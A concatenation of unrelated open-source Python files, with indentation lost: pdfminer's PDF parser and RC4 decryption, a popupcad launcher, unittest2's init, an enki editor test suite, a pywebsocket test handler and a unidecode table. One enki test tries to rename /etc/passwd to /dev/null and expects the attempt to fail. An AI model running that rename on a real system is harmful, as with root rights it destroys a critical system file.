PDFOBJ_CUE = re.compile(r'^(\d+)\s+(\d+)\s+obj\b')
def load_fallback(self, parser, debug=0):
parser.seek(0)
while 1:
try:
(pos, line) = parser.nextline()
except PSEOF:
break
if line.startswith('trailer'):
parser.seek(pos)
self.load_trailer(parser)
if 1 <= debug:
print >>sys.stderr, 'trailer: %r' % self.get_trailer()
break
m = self.PDFOBJ_CUE.match(line)
if not m: continue
(objid, genno) = m.groups()
self.offsets[int(objid)] = (0, pos)
return
def get_trailer(self):
return self.trailer
def get_objids(self):
return self.offsets.iterkeys()
def get_pos(self, objid):
try:
(genno, pos) = self.offsets[objid]
except KeyError:
raise
return (None, pos)
## PDFXRefStream
##
class PDFXRefStream(PDFBaseXRef):
def __init__(self):
self.data = None
self.entlen = None
self.fl1 = self.fl2 = self.fl3 = None
self.objid_ranges = []
return
def __repr__(self):
return '<PDFXRefStream: fields=%d,%d,%d>' % (self.fl1, self.fl2, self.fl3)
def load(self, parser, debug=0):
(_,objid) = parser.nexttoken() # ignored
(_,genno) = parser.nexttoken() # ignored
(_,kwd) = parser.nexttoken()
(_,stream) = parser.nextobject()
if not isinstance(stream, PDFStream) or stream['Type'] is not LITERAL_XREF:
raise PDFNoValidXRef('Invalid PDF stream spec.')
size = stream['Size']
index_array = stream.get('Index', (0,size))
if len(index_array) % 2 != 0:
raise PDFSyntaxError('Invalid index number')
self.objid_ranges.extend( ObjIdRange(start, nobjs)
for (start,nobjs) in choplist(2, index_array) )
(self.fl1, self.fl2, self.fl3) = stream['W']
self.data = stream.get_data()
self.entlen = self.fl1+self.fl2+self.fl3
self.trailer = stream.attrs
if 1 <= debug:
print >>sys.stderr, ('xref stream: objid=%s, fields=%d,%d,%d' %
(', '.join(map(repr, self.objid_ranges)),
self.fl1, self.fl2, self.fl3))
return
def get_trailer(self):
return self.trailer
def get_objids(self):
for objid_range in self.objid_ranges:
for x in xrange(objid_range.get_start_id(), objid_range.get_end_id()+1):
yield x
return
def get_pos(self, objid):
offset = 0
found = False
for objid_range in self.objid_ranges:
if objid >= objid_range.get_start_id() and objid <= objid_range.get_end_id():
offset += objid - objid_range.get_start_id()
found = True
break
else:
offset += objid_range.get_nobjs()
if not found: raise KeyError(objid)
i = self.entlen * offset
ent = self.data[i:i+self.entlen]
f1 = nunpack(ent[:self.fl1], 1)
if f1 == 1:
pos = nunpack(ent[self.fl1:self.fl1+self.fl2])
genno = nunpack(ent[self.fl1+self.fl2:])
return (None, pos)
elif f1 == 2:
objid = nunpack(ent[self.fl1:self.fl1+self.fl2])
index = nunpack(ent[self.fl1+self.fl2:])
return (objid, index)
# this is a free object
raise KeyError(objid)
## PDFPage
##
class PDFPage(object):
"""An object that holds the information about a page.
A PDFPage object is merely a convenience class that has a set
of keys and values, which describe the properties of a page
and point to its contents.
Attributes:
doc: a PDFDocument object.
pageid: any Python object that can uniquely identify the page.
attrs: a dictionary of page attributes.
contents: a list of PDFStream objects that represents the page content.
lastmod: the last modified time of the page.
resources: a list of resources used by the page.
mediabox: the physical size of the page.
cropbox: the crop rectangle of the page.
rotate: the page rotation (in degree).
annots: the page annotations.
beads: a chain that represents natural reading order.
"""
def __init__(self, doc, pageid, attrs):
"""Initialize a page object.
doc: a PDFDocument object.
pageid: any Python object that can uniquely identify the page.
attrs: a dictionary of page attributes.
"""
self.doc = doc
self.pageid = pageid
self.attrs = dict_value(attrs)
self.lastmod = resolve1(self.attrs.get('LastModified'))
self.resources = resolve1(self.attrs['Resources'])
self.mediabox = resolve1(self.attrs['MediaBox'])
if 'CropBox' in self.attrs:
self.cropbox = resolve1(self.attrs['CropBox'])
else:
self.cropbox = self.mediabox
self.rotate = (self.attrs.get('Rotate', 0)+360) % 360
self.annots = self.attrs.get('Annots')
self.beads = self.attrs.get('B')
if 'Contents' in self.attrs:
contents = resolve1(self.attrs['Contents'])
else:
contents = []
if not isinstance(contents, list):
contents = [ contents ]
self.contents = contents
return
def __repr__(self):
return '<PDFPage: Resources=%r, MediaBox=%r>' % (self.resources, self.mediabox)
## PDFDocument
##
class PDFDocument(object):
"""PDFDocument object represents a PDF document.
Since a PDF file can be very big, normally it is not loaded at
once. So PDF document has to cooperate with a PDF parser in order to
dynamically import the data as processing goes.
Typical usage:
doc = PDFDocument()
doc.set_parser(parser)
doc.initialize(password)
obj = doc.getobj(objid)
"""
debug = 0
def __init__(self, caching=True):
self.caching = caching
self.xrefs = []
self.info = []
self.catalog = None
self.encryption = None
self.decipher = None
self._parser = None
self._cached_objs = {}
self._parsed_objs = {}
return
def set_parser(self, parser):
"Set the document to use a given PDFParser object."
if self._parser: return
self._parser = parser
# Retrieve the information of each header that was appended
# (maybe multiple times) at the end of the document.
self.xrefs = parser.read_xref()
for xref in self.xrefs:
trailer = xref.get_trailer()
if not trailer: continue
# If there's an encryption info, remember it.
if 'Encrypt' in trailer:
#assert not self.encryption
self.encryption = (list_value(trailer['ID']),
dict_value(trailer['Encrypt']))
if 'Info' in trailer:
self.info.append(dict_value(trailer['Info']))
if 'Root' in trailer:
# Every PDF file must have exactly one /Root dictionary.
self.catalog = dict_value(trailer['Root'])
break
else:
raise PDFSyntaxError('No /Root object! - Is this really a PDF?')
if self.catalog.get('Type') is not LITERAL_CATALOG:
if STRICT:
raise PDFSyntaxError('Catalog not found!')
return
# initialize(password='')
# Perform the initialization with a given password.
# This step is mandatory even if there's no password associated
# with the document.
PASSWORD_PADDING = '(\xbfN^Nu\x8aAd\x00NV\xff\xfa\x01\x08..\x00\xb6\xd0h>\x80/\x0c\xa9\xfedSiz'
def initialize(self, password=''):
if not self.encryption:
self.is_printable = self.is_modifiable = self.is_extractable = True
return
(docid, param) = self.encryption
if literal_name(param.get('Filter')) != 'Standard':
raise PDFEncryptionError('Unknown filter: param=%r' % param)
V = int_value(param.get('V', 0))
if not (V == 1 or V == 2):
raise PDFEncryptionError('Unknown algorithm: param=%r' % param)
length = int_value(param.get('Length', 40)) # Key length (bits)
O = str_value(param['O'])
R = int_value(param['R']) # Revision
if 5 <= R:
raise PDFEncryptionError('Unknown revision: %r' % R)
U = str_value(param['U'])
P = int_value(param['P'])
self.is_printable = bool(P & 4)
self.is_modifiable = bool(P & 8)
self.is_extractable = bool(P & 16)
# Algorithm 3.2
password = (password+self.PASSWORD_PADDING)[:32] # 1
hash = md5.md5(password) # 2
hash.update(O) # 3
hash.update(struct.pack('<l', P)) # 4
hash.update(docid[0]) # 5
if 4 <= R:
# 6
raise PDFNotImplementedError('Revision 4 encryption is currently unsupported')
if 3 <= R:
# 8
for _ in xrange(50):
hash = md5.md5(hash.digest()[:length/8])
key = hash.digest()[:length/8]
if R == 2:
# Algorithm 3.4
u1 = Arcfour(key).process(self.PASSWORD_PADDING)
elif R == 3:
# Algorithm 3.5
hash = md5.md5(self.PASSWORD_PADDING) # 2
hash.update(docid[0]) # 3
x = Arcfour(key).process(hash.digest()[:16]) # 4
for i in xrange(1,19+1):
k = ''.join( chr(ord(c) ^ i) for c in key )
x = Arcfour(k).process(x)
u1 = x+x # 32bytes total
if R == 2:
is_authenticated = (u1 == U)
else:
is_authenticated = (u1[:16] == U[:16])
if not is_authenticated:
raise PDFPasswordIncorrect
self.decrypt_key = key
self.decipher = self.decrypt_rc4 # XXX may be AES
return
def decrypt_rc4(self, objid, genno, data):
key = self.decrypt_key + struct.pack('<L',objid)[:3]+struct.pack('<L',genno)[:2]
hash = md5.md5(key)
key = hash.digest()[:min(len(key),16)]
return Arcfour(key).process(data)
KEYWORD_OBJ = KWD('obj')
def getobj(self, objid):
if not self.xrefs:
raise PDFException('PDFDocument is not initialized')
if 2 <= self.debug:
print >>sys.stderr, 'getobj: objid=%r' % (objid)
if objid in self._cached_objs:
genno = 0
obj = self._cached_objs[objid]
else:
for xref in self.xrefs:
try:
(strmid, index) = xref.get_pos(objid)
break
except KeyError:
pass
else:
if STRICT:
raise PDFSyntaxError('Cannot locate objid=%r' % objid)
# return null for a nonexistent reference.
return None
if strmid:
stream = stream_value(self.getobj(strmid))
if stream.get('Type') is not LITERAL_OBJSTM:
if STRICT:
raise PDFSyntaxError('Not a stream object: %r' % stream)
try:
n = stream['N']
except KeyError:
if STRICT:
raise PDFSyntaxError('N is not defined: %r' % stream)
n = 0
if strmid in self._parsed_objs:
objs = self._parsed_objs[strmid]
else:
parser = PDFStreamParser(stream.get_data())
parser.set_document(self)
objs = []
try:
while 1:
(_,obj) = parser.nextobject()
objs.append(obj)
except PSEOF:
pass
if self.caching:
self._parsed_objs[strmid] = objs
genno = 0
i = n*2+index
try:
obj = objs[i]
except IndexError:
raise PDFSyntaxError('Invalid object number: objid=%r' % (objid))
if isinstance(obj, PDFStream):
obj.set_objid(objid, 0)
else:
self._parser.seek(index)
(_,objid1) = self._parser.nexttoken() # objid
(_,genno) = self._parser.nexttoken() # genno
(_,kwd) = self._parser.nexttoken()
# #### hack around malformed pdf files
#assert objid1 == objid, (objid, objid1)
if objid1 != objid:
x = []
while kwd is not self.KEYWORD_OBJ:
(_,kwd) = self._parser.nexttoken()
x.append(kwd)
if x:
objid1 = x[-2]
genno = x[-1]
# #### end hack around malformed pdf files
if kwd is not self.KEYWORD_OBJ:
raise PDFSyntaxError('Invalid object spec: offset=%r' % index)
try:
(_,obj) = self._parser.nextobject()
if isinstance(obj, PDFStream):
obj.set_objid(objid, genno)
except PSEOF:
return None
if 2 <= self.debug:
print >>sys.stderr, 'register: objid=%r: %r' % (objid, obj)
if self.caching:
self._cached_objs[objid] = obj
if self.decipher:
obj = decipher_all(self.decipher, objid, genno, obj)
return obj
INHERITABLE_ATTRS = set(['Resources', 'MediaBox', 'CropBox', 'Rotate'])
def get_pages(self):
if not self.xrefs:
raise PDFException('PDFDocument is not initialized')
def search(obj, parent):
if isinstance(obj, int):
objid = obj
tree = dict_value(self.getobj(objid)).copy()
else:
objid = obj.objid
tree = dict_value(obj).copy()
for (k,v) in parent.iteritems():
if k in self.INHERITABLE_ATTRS and k not in tree:
tree[k] = v
if tree.get('Type') is LITERAL_PAGES and 'Kids' in tree:
if 1 <= self.debug:
print >>sys.stderr, 'Pages: Kids=%r' % tree['Kids']
for c in list_value(tree['Kids']):
for x in search(c, tree):
yield x
elif tree.get('Type') is LITERAL_PAGE:
if 1 <= self.debug:
print >>sys.stderr, 'Page: %r' % tree
yield (objid, tree)
if 'Pages' not in self.catalog: return
for (pageid,tree) in search(self.catalog['Pages'], self.catalog):
yield PDFPage(self, pageid, tree)
return
def get_outlines(self):
if 'Outlines' not in self.catalog:
raise PDFNoOutlines
def search(entry, level):
entry = dict_value(entry)
if 'Title' in entry:
if 'A' in entry or 'Dest' in entry:
title = decode_text(str_value(entry['Title']))
dest = entry.get('Dest')
action = entry.get('A')
se = entry.get('SE')
yield (level, title, dest, action, se)
if 'First' in entry and 'Last' in entry:
for x in search(entry['First'], level+1):
yield x
if 'Next' in entry:
for x in search(entry['Next'], level):
yield x
return
return search(self.catalog['Outlines'], 0)
def lookup_name(self, cat, key):
try:
names = dict_value(self.catalog['Names'])
except (PDFTypeError, KeyError):
raise KeyError((cat,key))
# may raise KeyError
d0 = dict_value(names[cat])
def lookup(d):
if 'Limits' in d:
(k1,k2) = list_value(d['Limits'])
if key < k1 or k2 < key: return None
if 'Names' in d:
objs = list_value(d['Names'])
names = dict(choplist(2, objs))
return names[key]
if 'Kids' in d:
for c in list_value(d['Kids']):
v = lookup(dict_value(c))
if v: return v
raise KeyError((cat,key))
return lookup(d0)
def get_dest(self, name):
try:
# PDF-1.2 or later
obj = self.lookup_name('Dests', name)
except KeyError:
# PDF-1.1 or prior
if 'Dests' not in self.catalog:
raise PDFDestinationNotFound(name)
d0 = dict_value(self.catalog['Dests'])
if name not in d0:
raise PDFDestinationNotFound(name)
obj = d0[name]
return obj
## PDFParser
##
class PDFParser(PSStackParser):
"""
PDFParser fetch PDF objects from a file stream.
It can handle indirect references by referring to
a PDF document set by set_document method.
It also reads XRefs at the end of every PDF file.
Typical usage:
parser = PDFParser(fp)
parser.read_xref()
parser.set_document(doc)
parser.seek(offset)
parser.nextobject()
"""
def __init__(self, fp):
PSStackParser.__init__(self, fp)
self.doc = None
self.fallback = False
return
def set_document(self, doc):
"""Associates the parser with a PDFDocument object."""
self.doc = doc
return
KEYWORD_R = KWD('R')
KEYWORD_NULL = KWD('null')
KEYWORD_ENDOBJ = KWD('endobj')
KEYWORD_STREAM = KWD('stream')
KEYWORD_XREF = KWD('xref')
KEYWORD_STARTXREF = KWD('startxref')
def do_keyword(self, pos, token):
"""Handles PDF-related keywords."""
if token in (self.KEYWORD_XREF, self.KEYWORD_STARTXREF):
self.add_results(*self.pop(1))
elif token is self.KEYWORD_ENDOBJ:
self.add_results(*self.pop(4))
elif token is self.KEYWORD_NULL:
# null object
self.push((pos, None))
elif token is self.KEYWORD_R:
# reference to indirect object
try:
((_,objid), (_,genno)) = self.pop(2)
(objid, genno) = (int(objid), int(genno))
obj = PDFObjRef(self.doc, objid, genno)
self.push((pos, obj))
except PSSyntaxError:
pass
elif token is self.KEYWORD_STREAM:
# stream object
((_,dic),) = self.pop(1)
dic = dict_value(dic)
objlen = 0
if not self.fallback:
try:
objlen = int_value(dic['Length'])
except KeyError:
if STRICT:
raise PDFSyntaxError('/Length is undefined: %r' % dic)
self.seek(pos)
try:
(_, line) = self.nextline() # 'stream'
except PSEOF:
if STRICT:
raise PDFSyntaxError('Unexpected EOF')
return
pos += len(line)
self.fp.seek(pos)
data = self.fp.read(objlen)
self.seek(pos+objlen)
while 1:
try:
(linepos, line) = self.nextline()
except PSEOF:
if STRICT:
raise PDFSyntaxError('Unexpected EOF')
break
if 'endstream' in line:
i = line.index('endstream')
objlen += i
data += line[:i]
break
objlen += len(line)
data += line
self.seek(pos+objlen)
# XXX limit objlen not to exceed object boundary
if 2 <= self.debug:
print >>sys.stderr, 'Stream: pos=%d, objlen=%d, dic=%r, data=%r...' % \
(pos, objlen, dic, data[:10])
obj = PDFStream(dic, data, self.doc.decipher)
self.push((pos, obj))
else:
# others
self.push((pos, token))
return
def find_xref(self):
"""Internal function used to locate the first XRef."""
# search the last xref table by scanning the file backwards.
prev = None
for line in self.revreadlines():
line = line.strip()
if 2 <= self.debug:
print >>sys.stderr, 'find_xref: %r' % line
if line == 'startxref': break
if line:
prev = line
else:
raise PDFNoValidXRef('Unexpected EOF')
if 1 <= self.debug:
print >>sys.stderr, 'xref found: pos=%r' % prev
return long(prev)
# read xref table
def read_xref_from(self, start, xrefs):
"""Reads XRefs from the given location."""
self.seek(start)
self.reset()
try:
(pos, token) = self.nexttoken()
except PSEOF:
raise PDFNoValidXRef('Unexpected EOF')
if 2 <= self.debug:
print >>sys.stderr, 'read_xref_from: start=%d, token=%r' % (start, token)
if isinstance(token, int):
# XRefStream: PDF-1.5
self.seek(pos)
self.reset()
xref = PDFXRefStream()
xref.load(self, debug=self.debug)
else:
if token is self.KEYWORD_XREF:
self.nextline()
xref = PDFXRef()
xref.load(self, debug=self.debug)
xrefs.append(xref)
trailer = xref.get_trailer()
if 1 <= self.debug:
print >>sys.stderr, 'trailer: %r' % trailer
if 'XRefStm' in trailer:
pos = int_value(trailer['XRefStm'])
self.read_xref_from(pos, xrefs)
if 'Prev' in trailer:
# find previous xref
pos = int_value(trailer['Prev'])
self.read_xref_from(pos, xrefs)
return
# read xref tables and trailers
def read_xref(self):
"""Reads all the XRefs in the PDF file and returns them."""
xrefs = []
try:
pos = self.find_xref()
self.read_xref_from(pos, xrefs)
except PDFNoValidXRef:
# fallback
if 1 <= self.debug:
print >>sys.stderr, 'no xref, fallback'
self.fallback = True
xref = PDFXRef()
xref.load_fallback(self)
xrefs.append(xref)
return xrefs
## PDFStreamParser
##
class PDFStreamParser(PDFParser):
"""
PDFStreamParser is used to parse PDF content streams
that is contained in each page and has instructions
for rendering the page. A reference to a PDF document is
needed because a PDF content stream can also have
indirect references to other objects in the same document.
"""
def __init__(self, data):
PDFParser.__init__(self, StringIO(data))
return
def flush(self):
self.add_results(*self.popall())
return
def do_keyword(self, pos, token):
if token is self.KEYWORD_R:
# reference to indirect object
try:
((_,objid), (_,genno)) = self.pop(2)
(objid, genno) = (int(objid), int(genno))
obj = PDFObjRef(self.doc, objid, genno)
self.push((pos, obj))
except PSSyntaxError:
pass
return
# others
self.push((pos, token))
return
| bsd-3-clause |
Skylion007/popupcad | popupcad/filetypes/program.py | 1 | 1847 | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
import sys
import PySide.QtGui as qg
import popupcad
import logging
import traceback
class Program(object):
def __init__(self, plugins, *args, **kwargs):
args = list(args)
for item in args:
if '--deprecated' in item:
import popupcad_deprecated
popupcad.deprecated = popupcad_deprecated
sys.modules['popupcad.deprecated'] = popupcad_deprecated
args.pop(args.index(item))
self.app = qg.QApplication(args[0])
self.app.setWindowIcon(popupcad.supportfiles.Icon('popupcad'))
self.editor = popupcad.guis.editor.Editor()
if len(args) > 1 and not '--' in args[-1]:
self.editor.open(filename=args[-1])
self.editor.show()
for plugin in plugins:
plugin.initialize(self)
self.create_exception_listener()
def create_exception_listener(self):
logging.basicConfig(filename=popupcad.error_log_filename,filemode='w',level=logging.DEBUG)
import sys
self.excepthook_internal = sys.excepthook
sys.excepthook = self.excepthook
def excepthook(self,exctype,value,tb):
if exctype is not SystemExit:
message = '''{}: {}'''.format(str(exctype),str(value))
print(message)
tbmessage = traceback.format_tb(tb)
tbmessage = ' '.join(tbmessage)
logging.error(message)
logging.debug('\n'+tbmessage)
self.editor.error_log.appendText(message+'\n'+tbmessage)
self.excepthook_internal(exctype,value,tb)
mb = qg.QMessageBox()
mb.setText(message)
mb.exec_()
| mit |
leafji/MYSQL_5.7 | storage/ndb/mcc/tst/unittest2/__init__.py | 155 | 2406 | """
unittest2
unittest2 is a backport of the new features added to the unittest testing
framework in Python 2.7. It is tested to run on Python 2.4 - 2.6.
To use unittest2 instead of unittest simply replace ``import unittest`` with
``import unittest2``.
Copyright (c) 1999-2003 Steve Purcell
Copyright (c) 2003-2010 Python Software Foundation
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__all__ = ['TestResult', 'TestCase', 'TestSuite',
'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main',
'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless',
'expectedFailure', 'TextTestResult', '__version__', 'collector']
__version__ = '0.5.1'
# Expose obsolete functions for backwards compatibility
__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])
from unittest2.collector import collector
from unittest2.result import TestResult
from unittest2.case import (
TestCase, FunctionTestCase, SkipTest, skip, skipIf,
skipUnless, expectedFailure
)
from unittest2.suite import BaseTestSuite, TestSuite
from unittest2.loader import (
TestLoader, defaultTestLoader, makeSuite, getTestCaseNames,
findTestCases
)
from unittest2.main import TestProgram, main, main_
from unittest2.runner import TextTestRunner, TextTestResult
try:
from unittest2.signals import (
installHandler, registerResult, removeResult, removeHandler
)
except ImportError:
# Compatibility with platforms that don't have the signal module
pass
else:
__all__.extend(['installHandler', 'registerResult', 'removeResult',
'removeHandler'])
# deprecated
_TextTestResult = TextTestResult
__unittest = True | gpl-2.0 |
vi/enki | tests/test_core/test_opened_files_dock.py | 1 | 4222 | #!/usr/bin/env python
import unittest
import os.path
import sys
import tempfile
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
import base
from PyQt4.QtCore import Qt, QPoint
from PyQt4.QtTest import QTest
from enki.core.core import core
from enki.widgets.dockwidget import DockWidget
def _startEditCurrentFilePath():
tree = core.workspace().openedFileExplorer.tvFiles
model = core.workspace().openedFileExplorer.model
document = core.workspace().currentDocument()
tree.edit(model.documentIndex(document))
class Rename(base.TestCase):
def test_flags(self):
workspace = core.workspace()
tree = core.workspace().openedFileExplorer.tvFiles
model = core.workspace().openedFileExplorer.model
core.workspace().createEmptyNotSavedDocument()
def editable():
index = model.documentIndex(workspace.currentDocument())
return bool(int(model.flags(index)) & Qt.ItemIsEditable)
self.assertFalse(editable()) # empty not saved document
workspace.openFile(self.EXISTING_FILE)
self.assertTrue(editable()) # normal document
self.keyClicks('adsf', widget=workspace.currentDocument().qutepart)
self.assertFalse(editable()) # modified document
@base.inMainLoop
def test_success(self):
core.workspace().openFile(self.EXISTING_FILE)
NEW_PATH = self.TEST_FILE_DIR + '/newname'
_startEditCurrentFilePath()
self.keyClicks(NEW_PATH)
self.keyClick(Qt.Key_Return)
QTest.qWait(100) # Test fails without a sleep. Threads inside Qt???
self.assertTrue(os.path.isfile(NEW_PATH))
with open(NEW_PATH) as f:
text = f.read()
self.assertEqual(text, self.EXISTING_FILE_TEXT)
@base.inMainLoop
def test_os_fail(self):
core.workspace().openFile(self.EXISTING_FILE)
# The path shall be invalid on both Unix and Windows
NEW_PATH = '/root/newname:::'
_startEditCurrentFilePath()
self.keyClicks(NEW_PATH)
def runInDialog(dialog):
self.assertEqual(dialog.windowTitle(), 'Failed to rename file')
self.keyClick(Qt.Key_Return)
self.openDialog(lambda: self.keyClick(Qt.Key_Return),
runInDialog)
@base.inMainLoop
def test_same_path(self):
core.workspace().openFile(self.EXISTING_FILE)
_startEditCurrentFilePath()
self.keyClicks(self.EXISTING_FILE)
self.keyClick(Qt.Key_Return)
self.assertEqual(self.app.activeWindow(), core.mainWindow()) # not messagebox with error
@base.inMainLoop
def test_dev_null(self):
core.workspace().openFile(self.EXISTING_FILE)
NEW_PATH = '/dev/null'
_startEditCurrentFilePath()
self.keyClicks(NEW_PATH)
self.keyClick(Qt.Key_Return)
QTest.qWait(100) # Test fails without a sleep. Threads inside Qt???
self.assertFalse(os.path.isfile(self.EXISTING_FILE))
self.assertIsNone(core.workspace().currentDocument())
# This test reports a permission denied dailog box failure in Windows, but then crashes. Not sure how to work around this.
@unittest.skipUnless(sys.platform.startswith("linux"), "requires Linux")
@base.inMainLoop
def test_dev_null_os_fail(self):
# On Windows, a file in use cannot be deleted. Create one.
with tempfile.NamedTemporaryFile() as tempFile:
# In Linux, pick and undeleteable file (don't run this as root!)
if sys.platform.startswith("linux"):
existingNotDeletableFile = '/etc/passwd'
else:
existingNotDeletableFile = tempFile.name
core.workspace().openFile(existingNotDeletableFile)
NEW_PATH = '/dev/null'
_startEditCurrentFilePath()
self.keyClicks(NEW_PATH)
def runInDialog(dialog):
self.assertTrue(dialog.windowTitle(), 'Not this time')
self.keyClick(Qt.Key_Return)
self.openDialog(lambda: self.keyClick(Qt.Key_Return),
runInDialog)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
Jayflux/servo | tests/wpt/web-platform-tests/tools/pywebsocket/test/testdata/handlers/sub/wrong_transfer_sig_wsh.py | 499 | 1854 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Wrong web_socket_transfer_data() signature.
"""
def web_socket_do_extra_handshake(request):
pass
def no_web_socket_transfer_data(request):
request.connection.write(
'sub/wrong_transfer_sig_wsh.py is called for %s, %s' %
(request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
| mpl-2.0 |
melvon22/osmc | package/mediacenter-skin-osmc/files/usr/share/kodi/addons/script.module.unidecode/lib/unidecode/x020.py | 99 | 4059 | data = (
' ', # 0x00
' ', # 0x01
' ', # 0x02
' ', # 0x03
' ', # 0x04
' ', # 0x05
' ', # 0x06
' ', # 0x07
' ', # 0x08
' ', # 0x09
' ', # 0x0a
' ', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'-', # 0x10
'-', # 0x11
'-', # 0x12
'-', # 0x13
'--', # 0x14
'--', # 0x15
'||', # 0x16
'_', # 0x17
'\'', # 0x18
'\'', # 0x19
',', # 0x1a
'\'', # 0x1b
'"', # 0x1c
'"', # 0x1d
',,', # 0x1e
'"', # 0x1f
'+', # 0x20
'++', # 0x21
'*', # 0x22
'*>', # 0x23
'.', # 0x24
'..', # 0x25
'...', # 0x26
'.', # 0x27
'\x0a', # 0x28
'\x0a\x0a', # 0x29
'', # 0x2a
'', # 0x2b
'', # 0x2c
'', # 0x2d
'', # 0x2e
' ', # 0x2f
'%0', # 0x30
'%00', # 0x31
'\'', # 0x32
'\'\'', # 0x33
'\'\'\'', # 0x34
'`', # 0x35
'``', # 0x36
'```', # 0x37
'^', # 0x38
'<', # 0x39
'>', # 0x3a
'*', # 0x3b
'!!', # 0x3c
'!?', # 0x3d
'-', # 0x3e
'_', # 0x3f
'-', # 0x40
'^', # 0x41
'***', # 0x42
'--', # 0x43
'/', # 0x44
'-[', # 0x45
']-', # 0x46
'??', # 0x47
'?!', # 0x48
'!?', # 0x49
'7', # 0x4a
'PP', # 0x4b
'(]', # 0x4c
'[)', # 0x4d
'*', # 0x4e
'[?]', # 0x4f
'[?]', # 0x50
'[?]', # 0x51
'%', # 0x52
'~', # 0x53
'[?]', # 0x54
'[?]', # 0x55
'[?]', # 0x56
"''''", # 0x57
'[?]', # 0x58
'[?]', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'', # 0x6a
'', # 0x6b
'', # 0x6c
'', # 0x6d
'', # 0x6e
'', # 0x6f
'0', # 0x70
'', # 0x71
'', # 0x72
'', # 0x73
'4', # 0x74
'5', # 0x75
'6', # 0x76
'7', # 0x77
'8', # 0x78
'9', # 0x79
'+', # 0x7a
'-', # 0x7b
'=', # 0x7c
'(', # 0x7d
')', # 0x7e
'n', # 0x7f
'0', # 0x80
'1', # 0x81
'2', # 0x82
'3', # 0x83
'4', # 0x84
'5', # 0x85
'6', # 0x86
'7', # 0x87
'8', # 0x88
'9', # 0x89
'+', # 0x8a
'-', # 0x8b
'=', # 0x8c
'(', # 0x8d
')', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'[?]', # 0x94
'[?]', # 0x95
'[?]', # 0x96
'[?]', # 0x97
'[?]', # 0x98
'[?]', # 0x99
'[?]', # 0x9a
'[?]', # 0x9b
'[?]', # 0x9c
'[?]', # 0x9d
'[?]', # 0x9e
'[?]', # 0x9f
'ECU', # 0xa0
'CL', # 0xa1
'Cr', # 0xa2
'FF', # 0xa3
'L', # 0xa4
'mil', # 0xa5
'N', # 0xa6
'Pts', # 0xa7
'Rs', # 0xa8
'W', # 0xa9
'NS', # 0xaa
'D', # 0xab
'EUR', # 0xac
'K', # 0xad
'T', # 0xae
'Dr', # 0xaf
'[?]', # 0xb0
'[?]', # 0xb1
'[?]', # 0xb2
'[?]', # 0xb3
'[?]', # 0xb4
'[?]', # 0xb5
'[?]', # 0xb6
'[?]', # 0xb7
'[?]', # 0xb8
'[?]', # 0xb9
'[?]', # 0xba
'[?]', # 0xbb
'[?]', # 0xbc
'[?]', # 0xbd
'[?]', # 0xbe
'[?]', # 0xbf
'[?]', # 0xc0
'[?]', # 0xc1
'[?]', # 0xc2
'[?]', # 0xc3
'[?]', # 0xc4
'[?]', # 0xc5
'[?]', # 0xc6
'[?]', # 0xc7
'[?]', # 0xc8
'[?]', # 0xc9
'[?]', # 0xca
'[?]', # 0xcb
'[?]', # 0xcc
'[?]', # 0xcd
